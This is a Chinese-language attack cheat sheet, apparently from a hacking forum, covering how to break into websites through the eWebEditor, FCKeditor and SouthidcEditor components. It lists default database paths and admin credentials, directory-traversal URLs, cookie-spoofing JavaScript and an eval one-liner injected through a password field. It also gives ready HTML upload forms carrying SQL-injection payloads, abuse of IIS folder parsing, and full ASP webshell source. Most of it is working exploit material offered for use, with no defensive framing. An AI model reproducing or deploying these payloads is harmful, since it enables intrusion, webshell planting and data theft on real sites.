利用编辑器漏洞ewebeditor-fckeditor-southidceditor
ewebeditor
默认数据库路径:[PATH]/db/ewebeditor.mdb [PATH]/db/db.mdb [PATH]/db/%23ewebeditor.mdb 默认密码:admin/admin888 或 admin/admin 进入后台,也可尝试 admin/123456/admin888 系统默认:ewebeditor.asp?id=content1&style=standard 样式调用 eWebEditor.asp?id=45&style=standard1 查看版本: edit/dialog/about.html ewebeditor/dialog/about.html eweb/dialog/about.html ewebedit/dialog/about.html ewindoweditor/dialog/about.html /ewebeditor.asp?id=NewsContent&style=s_full 出现一堆编辑框,有远程上传,先点感叹号!查看版本! 直接访问:Admin_Private.asp eWebEditor2.8.0最终版删除任意文件漏洞: Example\NewsSystem目录下的delete.asp phpupload.html 新密码设置为 1":eval request("h")' 设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了 /ewebeditornet/upload.aspx 直接cer马,不能上传则输入javascript:lbtnUpload.click();查看源代码找地址,默认uploadfile这个文件夹 jsp的版本,根本没有对上传文件类型进行检测!需要注意的是jsp版本的没有上传按钮!直接选择文件,回车就可以提交了! ewebeditor可以列目录,在ewebeditor后面添加admin_uploadfile.asp?id=14&dir=../.. ------------------------------------------------ eWebEditor踩脚印式入侵 脆弱描述: 当我们下载数据库后查询不到密码MD5的明文时,可以去看看webeditor_style(14)这个样式表,看看是否有前辈入侵过 或许已经赋予了某控件上传脚本的能力,构造地址来上传我们自己的WEBSHELL. 攻击利用: 比如 ID=46 s-name =standard1 构造 代码: ewebeditor.asp?id=content&style=standard ID和和样式名改过后 ewebeditor.asp?id=46&style=standard1 ------------------------------------------------- -------------------------------------------------- eWebEditor遍历目录漏洞 第一种:ewebeditor/admin_uploadfile.asp?id=14 在id=14后面添加&dir=.. 再加 &dir=../.. &dir=http://www.xxx.com/../.. 看到整个网站文件了 第二种: ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./.. --------------------------------------------------- --------------------------------------------------- cookie欺骗: /eWebEditor/admin/login.php - admin_login.asp 随便输入一个用户和密码,会提示出错了. javascript:alert(document.cookie="adminuser="+escape("admin")); javascript:alert(document.cookie="adminpass="+escape("admin")); javascript:alert(document.cookie="admindj="+escape("1")); --------------------------------------------------- 2.1.6的 直接用此exp <HTML><HEAD><TITLE>ewebeditor的upload文件上传exp</TITLE><meta http-equiv="Content-Type" content="text/html; charset=gb2312"> </head><body bgcolor=orange> <tr>不是通杀,版本有区别!我就郁闷,落叶那JJ说文章没说清楚,这份EXP就是根据文章写出来的!落叶那家伙的EXP我看半天没看明白有啥区别!<br></tr> <tr>文件传到了uploadfile目录下了</tr><br> <tr>不知道算不算0day,我是冰的原点</tr><br> <tr>至于利用方法就是修改源文件中的action,然后传cer的马马就行了!</tr><br> <form action="http://www.yunsec.net/ewebeditor/upload.asp?action=save&type=IMAGE&style=firefox'%20union%20select%20S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,%20[S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl%20from%20ewebeditor_style%20where%20s_name='standard'%20and%20'a'='a" method=post name=myform enctype="multipart/form-data"><input type=file name=uploadfile size=100 style="width:100%"><input type=submit value=传吧></form> 2.1.6以前版本的用此exp <H1>ewebeditor asp版1.0.0 上传漏洞利用程序----By HCocoa</H1><br><br> <form action="http://www.yunsec.net/ewebeditor/upload.asp?action=save&type=IMAGE&style=hcocoa' union select S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer|aspx',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=Fuck> </form> 如果目录不充许执行脚本,要换目录,用这个exp.... /db可以自定义,不过要绝对路径! <form action="http://www.yunsec.net/upload.asp?action=save&type=IMAGE&style=horind' union select S_ID,S_Name,S_Dir,S_CSS,[S_UploadDir]%2b'/../db',S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=Fuck> </form> 2.7.0版本注入点 http://www.XXX.COM/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200 默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解,对此进行注入取得账号密码 ewebeditor 2.7.5 上传漏洞:这个用在修改了可以上传asa但是提示没有工具栏的情况下 <form action="http://www.yunsec.net/ewebedit/upload.asp?action=save&type=&style=可以上传asa的样式名" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=1 style="width:100%"> <input type=submit value="上传了"></input> </form> 这个要下载它的数据库看有没有前辈的脚印才能利用! ewebeditor 2.8.0 上传漏洞:前提要开启远程上传,然后传一个webshell.jpg.asp即可,查看源代码即可获得shell地址。 这0day我从来没成功过,不知道是真还是假!不过用另一个成功过 http://www.yunsec.net/ewebeditor.asp?id=NewsContent&style=s_full 调用这个样式,会出现远程上传按纽,再用下面的方法远程上传! 远程上传时执行代码,导致get shell 1.把x.jpg.asp xiaoma.ASa放在同一目录下 ——————x.jpg.asp ———————————————————————————————————— <% Set fs = CreateObject("Scripting.FileSystemObject") Set MyTextStream=fs.OpenTextFile(server.MapPath("\xiaoma.asp"),1,false,0) Thetext=MyTextStream.ReadAll response.write thetext %> ——————————————————————x.jpg.asp———————————————————— ————————xiaoma.ASa—————————————————————————— <%on error resume next%> <%ofso="scripting.filesystemobject"%> <%set fso=server.createobject(ofso)%> <%path=request("path")%> <%if path<>"" then%> <%data=request("dama")%> <%set dama=fso.createtextfile(path,true)%> <%dama.write data%> <%if err=0 then%> <%="success"%> <%else%> <%="false"%> <%end if%> <%err.clear%> <%end if%> <%dama.close%> <%set dama=nothing%> <%set fos=nothing%> <%="<form action='' method=post>"%> <%="<input type=text name=path>"%> <%="<br>"%> <%=server.mappath(request.servervariables("script_name"))%> <%="<br>"%> <%=""%> <%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%> <%="<br>"%> <%="<input type=submit value=save>"%> <%="</form>"%> ————————xiaoma.ASa—————————————————————————— 2.远程上传x.jpg.asp 受影响文件:eWebEditorNet/upload.aspx 利用方法:添好本地的cer的Shell文件。在浏览器地址栏输入javascript:lbtnUpload.click();就能得到shell。嘿嘿....绕过了限制......成功的上传了ASPX文件....文件默认的上传后保存的地址是eWebEditorNet/UploadFile/现在来看看是否上传成功..... php版:给出exp <form action="" method=post enctype="multipart/form-data"> <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> URL:<input type=text name=url value="http://192.168.1.110/eWebEditor/" size=100><br> <INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov||| gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> file:<input type=file name="uploadfile"><br> <input type=button value=submit onclick=fsubmit()> </form><br> <script> function fsubmit(){ form = document.forms[0]; formform.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en'; alert(form.action); form.submit(); } </script>
fckeditor
Fckeditor的版本。 FCKeditor/_whatsnew.html FCKeditor/editor/dialog/fck_about.html /FCKeditor/editor/dialog/imageuser.php 截断上传php asp aspx /fckeditor/editor/fckeditor.html ----------------------------------------------- 以JSP为例子的文件配置:查看配置和列出目录下的文件. http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=../&CurrentFolder=%2F /FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector 上传地址: http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/jsp/connector.jsp ../为根目录 ---------------------------------------------- 其次,你确定下以下几个上传页面是否真的被删除了呢? /FCKeditor/editor/dialog/imageuser.php /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/editor/filemanager/browser/default/connectors/test.html /FCKeditor/editor/filemanager/upload/test.html /FCKeditor/editor/filemanager/connectors/test.html /FCKeditor/editor/filemanager/connectors/uploadtest.html 嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么 /fckeditor/editor/filemanager/connectors/aspx/connector.aspx /fckeditor/editor/filemanager/connectors/asp/connector.asp /fckeditor/editor/filemanager/connectors/php/connector.php 如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例 1.查看Media目录下的文件: /fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F 红色Media可以更改为File或者image,相应的进入文件或者图片目录下 2.利用iis解析漏洞创建1.asp特殊目录 fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp 红色的是对应的Media目录,蓝色的是特殊目录名字 3.构建表单,上传webshell到特殊目录 <form id="frmUpload" enctype="multipart/form-data" action="http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2F1.asp" method="post"> Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。 <form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> 其他上传地址 FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp/sample04.asp
southidceditor
http://www.xxx.com/admin/southidceditor/datas/southidceditor.mdb http://www.xxx.com/admin/southidceditor/admin/admin_login.asp http://www.xxx.com/admin/southidceditor/popup.asp http://www.xxx.com/admin/southidceditor/login.asp http://www.xxx.com/admin/Southidceditor/admin_style.asp?action=copy&id=14 http://www.xxx.com/admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47 http://www.xxx.com/admin/Southidceditor/ewebeditor.asp?id=57&style=southidc
最后说2句:
在粘贴复制之前,首先确定目标是windows还是linux. 对于大小写敏感.
例如:/FCKeditor/editor/filemanager/browser/default/connectors/test.html
与 /fckeditor/editor/filemanager/browser/default/connectors/test.html 均得测试看看.